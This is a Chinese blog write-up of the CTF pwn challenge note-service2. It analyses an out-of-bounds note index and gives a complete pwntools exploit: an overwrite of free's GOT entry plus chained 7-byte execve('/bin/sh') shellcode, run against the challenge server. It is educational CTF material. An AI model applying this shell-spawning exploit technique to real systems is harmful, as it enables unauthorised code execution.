[攻防世界]noteservice2

于 2023-01-15 21:41:33 发布
阅读量278 收藏
点赞数 2
文章标签: 数据结构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55906008/article/details/128698236
版权

[pwn-堆]note-service2

一、查看保护机制和运行过程

image-20221231140113647

分析: 64位程序,通过寄存器传参,字长为8字节。 部分 RELRO:可以劫持got表。开启canary保护和地址随机化保护。

image-20221231140153854

一道菜单题,输入测试,好像没什么反应

二、拖入ida分析

主要代码段

注意:下图为修改变量名并添加注释后的伪代码!!

image-20230115124233592

image-20230115124316504

小tips:根据程序的运行行为,修改变量名,添加注释,利于后续分析。

add_note

image-20230115124335966

分析: 首先将目前note里存入的数量拿出来比较一下,当current_size在0到11之间就还能存储,之后输入index,size,这里会判断一下你要插入的笔记大小是否大于8,只有大小小于等于8时才能插入,这里会在堆上申请一块size大小的chunk,并返回指向chunk数据区域的指针,申请成功的指针存入note数组;如果申请成功,则插入内容。

del_note

image-20221231183546333

分析:free堆块,用到free函数

sub_AC3

image-20221231185014775

这里有一个往申请的chunk里填入数据的函数,可见最后一个字节(倒数第一个)要填为0,因此每次申请x个字节,只有x-1个字节可以使用,第x字节置为0.

漏洞点

分析了一圈,发现并没有对index进行检查。我们可以看出,是一个数组越界的漏洞,而且可以堆栈执行shell。所以大致思路为申请一些堆块并写入shellcode,然后将某一个函数的got表修指向堆块shell,调用该函数运行shellcode,进而获得shell

但是现实很骨感,我们面临好多困难,shellcode要怎么写? 一个堆块中只能写入7字节的数据,但shellcode远不止7字节,怎么处理?下面我们一一处理问题

前提知识:

image-20230115125117831

一个堆块中只能放7字节,而shellcode不止7字节怎么办?

可以每个堆块存放一些,利用jmp指令实现短跳,连接起各个堆块。 shellcode的选择尽量越短越好

jmp short offset 对应的机器码为\xeb\x**

image-20230115132054906

offset = 8 + 8 + 8 + 1 = 0x19**(从该命令结束的地方到下一个代码的起始位置)**

即跳转指令为jmp short 0x19,对应的机器码为: \xeb\e19

mov rdi, xxx   //xxx=&("/bin/sh")
xor rsi,rsi   //rsi=0,实际可以是mov rsi, 0 但是mov这个命令太长了。下同。
mov rax, 0x3b //rax=0x3b,0x3b为64位下execve对应的系统调用号
xor rdx,rdx   //rdx=0,使用xor可以尽可能的缩短转换为机器码的字节数
syscall
#就是syscall调用execve("/bin/sh",0,0)
rdi的值怎么设置?

申请一个堆块A,然后在A堆块里写入"/bin/sh",然后修改free的got,再调用free函数释放A堆块的时候,第一个参数为A堆块地址。即"/bin/sh"的地址。所以需要劫持free的got表,修改为堆块A的地址。

利用数组越界修改got表处的内容,先根据以下高亮处计算偏移:

image-20221231202723469

image-20221231202744012

(2020A0 - 202018) / 8 = 0x11,即第一个堆块的-17处为free的got表的内容 8是因为64位,8字节表示一个指针

三、构造exp

注意:每个堆块中都需要补齐8字节,程序会默认在最后补0,故shellcode片段+nop指令+jmpshort指令为7字节

#前期可以根据以下代码确定要填充的nop指令长度
from pwn import *
context.update(arch = 'amd64')
print(len(asm("xor rsi,rsi")))
print(len(asm("mov eax, 0x3b")))
print(len(asm("xor rdx, rdx")))
print(len(asm("syscall")))

运行结果:

image-20230101162228621

#coding=utf-8
from pwn import *
context.log_level='debug'
context.update(arch='amd64')
#io=process("./noteservice")
io=remote('223.112.5.156',65298)

def add(index,content):
    io.recvuntil("your choice>>")
    io.sendline("1")
    io.recvuntil("index:")
    io.sendline(str(index))
    io.recvuntil("size:")
    io.sendline("8")  #全部申请为最大堆块8字节
    io.recvuntil("content:")
    io.sendline(content)
def dele(index):
    io.recvuntil("your choice>>")
    io.sendline("4")
    io.recvuntil("index:")
    io.sendline(str(index))

 #注意:此处asm返回的为bytes,为使得类型统一,后面的字符串要加b前缀
add(0,"/bin/sh")
add(-17,asm("xor rsi,rsi")+b"\x90\x90\xeb\x19") #补齐8字节吗
add(1,asm("mov eax, 0x3b")+b"\xeb\x19")
add(2,asm("xor rdx, rdx")+b"\x90\x90\xeb\x19")
add(3,asm("syscall").ljust(7,b"\x90")) #左对齐,右侧补/x90
dele(0)#程序流开始的地方,为got表中的free函数
 
io.interactive()

题目写完,来一个小小的总结,把这道题的亮点和避坑点简单提一下(针对小白,大佬除外~~):

  1. 为保证shellcode短小精悍,原本的mov rsi, 0 写为xor rsi,rsi;
  2. jmp short 0x19的跳转位置需要调试一下才能知道为:从该代码的结束位置到下一代码的起始位置为偏移~
  3. 在python3中,字符串前面最好加b来统一类型。
  4. 面对重复操作,例如add,封装函数是一个不错的选择~
  5. 静态分析程序时改变量名也是个很好的选择哦~

怎么编写shellcode?

一般采用pwntools里的asm(shellcraft.sh()),一些简单的shellcode(比如本题中),自己可以手动编写,目的为调用execve(‘\bin\sh’)

最后祝愿每一位热爱ctf,热爱pwn的选手都能更上一层楼,在各大比赛中能展露自己的锋芒~
ellcode?**

一般采用pwntools里的asm(shellcraft.sh()),一些简单的shellcode(比如本题中),自己可以手动编写,目的为调用execve(‘\bin\sh’)

最后祝愿每一位热爱ctf,热爱pwn的选手都能更上一层楼,在各大比赛中能展露自己的锋芒~

魔瞳。
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界进阶题note_service2: 堆区第一题!
weixin_48066554的博客
03-16 336
note_service: 堆区第一题! 拿到题目,按惯例checksec: 发现开了PIE和Canary,这意味着我们不能愉快地ret2text了,有点难受,但是没开NX,那不就ret 2 system call 一把梭哈了吗 丢到ida里看一下(为方便阅读,已将部分函数名、变量名进行了更改): 反汇编 1、程序主体 void choice() { while ( 1 ) { menu(); printf("your choice>> "); switch (
攻防世界PWN之note-service2题解
seaaseesa的博客
11-10 2780
note-service2 首先看一下程序的保护机制,注意,PIE是开启的,这个checksec检测PIE有时候不准确。不过,我们看到NX是关闭的,说明堆栈的数据可以被当做指令执行 然后,我们用IDA分析一下,发现是一个很简单程序,并且只有添加和删除功能,其他功能未实现 创建这里,有三处值得我们注意 创建的堆空间大小最多为8字节 保存堆指针的数组下标可以越界 既然数组下...
堆指针越界&堆上布置shellcode|攻防世界pwn进阶区 note-service2
Kni9hT's Blog
03-18 595
文章目录前言思路分析0x00.检查保护机制0x01.查看程序功能0x02.ida查看逻辑0x03.利用思路利用过程0x00.选一段shellcode布置在堆上0x01.计算jmp short指令要跳多少字节0x02.shellcode转换为asm格式0x03.通过64位传参机制把&("/bin/sh")传到rdi0x04.计算free的got地址和堆数组静态地址的距离0x05. 尝试写ex...
攻防世界note-service2
像初雪一样自由洒落
02-20 682
来源:CISCN-2018-Quals 参考: 1.https://blog.csdn.net/qq_42728977/article/details/103914342 2.https://blog.csdn.net/seaaseesa/article/details/103003167
攻防世界-note-service2-Writeup
SkYe's Blog
05-15 365
note-service2 [collapse title=“展开查看详情” status=“false”] 考点:堆上shellcode 保护情况:NX 保护关闭 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments 漏洞函数:存放堆指针的数组可越界存放。也就是堆指针可放置
XCTF note-service2
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-09 857
查程序保护机制 开启了PIE和CANARRY 没有开启NX,堆栈具有可执行权限 IDA64载入程序,查看main函数 重点分析sub_E30(); 经过分析得知sub_C56()是一个输出提示信息的函数,sub_B91()是获取用户输入值的函数 sub_DC1();sub_DD4();这两个函数的功能未完成 仅实现了sub_CA5();sub_DE7();这两个函数,这两个函数实现了添加和删...
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界misc2-1杂项
11-20
攻防世界misc2-1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947409
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
note-service2(xctf)
weixin_43868725的博客
08-08 527
0x0 程序保护和流程 保护: 流程: main() real_main() 选择1可以新建一个note,选择2和3没有实现,选择4可以删除note,选择5可以退出程序。但是在选择1的时候没有对数组的边界进行考虑。 0x1 利用过程 1.虽然这个程序也存在UAF漏洞但是由于输出和修改功能没有实现所以能利用的角度基本没有,但是数组越界可以任意地址写。 2.可以发现相对于数组的低地址处有**.got.plt表,并且.got.plt表是有读写权限的。所以可以修改.got.plt**表 可以得到偏移就是
ADworld pwn wp - note-service2
fa1c4的blog
06-26 122
qword_2020A0[v1] = malloc(result);存在数组越界漏洞, 可以借此将特定的指针写到got表里 写入content的处理函数, 最后一个字节会赋值为0, 所以可用的空间是7字节 选择delete会触发free() 整合已有信息: (1) 数组越界漏洞 (2) 一个chunk可以使用7字节 (3) delete选项可以free相应的chunk 利用思路: (1) 申请多个chunk, 分段写入shellcode (2) 利用数组越界修改free的got表项为shellc...
[BUUCTF]PWN——wustctf2020_name_your_dog(越界修改got表)
mcmuyanga的博客
03-18 459
wustctf2020_name_your_dog 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,检索字符的时候发现了后门函数,shell_addr=0x80485cb 主要函数,感觉跟cat那题差不多 漏洞函数 ...
攻防世界pwn之note-service
qq_42728977的博客
01-09 835
写在前面:最近在准备期末考试,姑且是这个理由吧,pwn和re都停了一个月了,感觉自己不够持之以恒,本来说还得一天一道题,给搁置了一个多月了,pwn和re这东西,不进则退,搞得我很难受,本来想的是,这个学期有点成绩,但是现在看来才是刚入门,而且还要复习考研,时间和精力会更少。喜欢pwn和re是因为自己很喜欢从原理搞清楚一个事情。不多啰嗦了,开始写wp了。 题目:note-service 原题是CIS...
CISCN-2018-Quals note-service2
qq_41071646的博客
07-23 964
这几天看 wiki 有点头疼 刷会 攻防世界 (那个echo_back 真的头疼 那个 文件结构 不知道是怎么搞出来的) 哪一行代码也不是很清楚是怎么做的 于是就直接跳过那个题目了 note-service2 这个题用ida 分析的时候 看见 show 不能用 笑容 逐渐 凝固 看见edit 不能用的时候 直接关闭了ida 然后发现保护如下 shellcode 一把梭鸭 ...
【PWN系列】攻防世界 pwn note-service2题目分析
Vicl1fe的博客
10-21 464
主要题解:https://blog.csdn.net/seaaseesa/article/details/103003167 这篇文章写已经是不错的了,这里主要写一下我对上面那篇文章的理解 1、以下code0到code3的长度都是七个字节。不足七个字节的用\x90填充。90机器码所代表的汇编指令是nop。因为我们跳转的时候用的是相对偏移跳转,所以必须要填充为七个字节,否则偏移要重新计算了。 code0 = (asm('xor rax,rax') + '\x90\x90\xeb\x19') #rax =
CTF-PWN-note-service2 (堆中shellcode执行)
SuperGate的博客
11-18 554
checksec Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments 发现没有开启NX,因此很有可能是要我们将sh...
攻防世界”pwn之format2
qq_42728977的博客
12-11 456
原理: 栈溢出、后门 环境: ubuntu14 工具: pwntools 、IDA 步骤: 查看程序的基本信息: 可以看出程序是32位,斌开了canary和nx 在IDA进行分析查看 看到程序并没有canary的压栈,我当时很奇怪为什么,让你后又看了几个函数,发现也没有,后来看大佬的 WP说是部分函数有,这里的canary是个迷惑。这没有canary就方便很多了。 一点一点看,发现这就是一个...
攻防世界 reverse 2
最新发布
10-21
根据提供的引用内容,攻防世界 reverse 2 是一道新手 Reverse 题目。在解包 hh 文件后,得到一个32位程序,使用 ida 进行逆向分析。在程序中发现了两个加密函数,其中函数1140是AES加密的S盒初始值密钥拓展。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值